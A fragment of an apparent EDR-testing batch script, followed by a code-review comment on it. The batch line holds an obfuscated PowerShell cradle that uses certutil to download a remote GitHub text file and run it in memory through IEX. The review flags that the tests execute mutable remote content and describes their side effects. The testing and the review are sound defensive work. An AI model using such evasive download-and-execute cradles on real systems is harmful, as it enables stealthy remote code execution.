MEMORY\CERTUTIL exec +start "" cmd /c powershell -c "SV c3z 'https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt';dir ty*;SI Variable:\NI1 (certutil -ping (GV c3z).Value);.(GAL IE*)(((Variable NI1 -Val)[2..(((Variable NI1 -Val)).Length-2)]-Join\"`r`n\"))" +echo Execution Finished at %time% %date% +timeout 5 + + + echo [+] Let tasks finish before deleting all the files timeout 60
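Review bot: Every one of the seventeen new tests in this hunk fetches `https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt` from the mutable `master` branch and executes whatever comes back (`IEX`, `[ScriptBlock]::Create(...).Invoke()`, `[Class]::Method(...)`), so the README's statement that the script only launches calc.exe holds only for as long as nobody can alter that file or tamper with the transfer. Pinning the URL to a commit (`.../op7ic/EDR-Testing-Script/<COMMIT_SHA>/Payloads/CradleTest.txt`) and hoisting it into a single `set PAYLOAD_URL=...` near the top of runtests.bat, referenced as `%PAYLOAD_URL%` inside the `powershell -c` strings, would make the pin auditable and changeable in one place instead of seventeen embedded literals. The PSSENDKEYS, PSCOMWORD, PSCOMEXCEL and PSCOMIE tests drive Notepad, Word, Excel and Internet Explorer through the UI/COM, write under `HKCU:\Software\Microsoft\Notepad` and clear the clipboard, none of which the `[+] Testing ...` echo lines mention; a `REM` before the `Testing Invoke-CradleCrafter PAYLOADS` banner stating these side effects, and that a missing Office/IE install may leave those `While(...Busy)` loops or the COM process hanging past the final `timeout 60` cleanup, would help whoever runs this on a shared host. One wording nit: `echo %time% %date% [+] Testing MEMORY\PSSENDKEYS execs` should read `exec` like every sibling line.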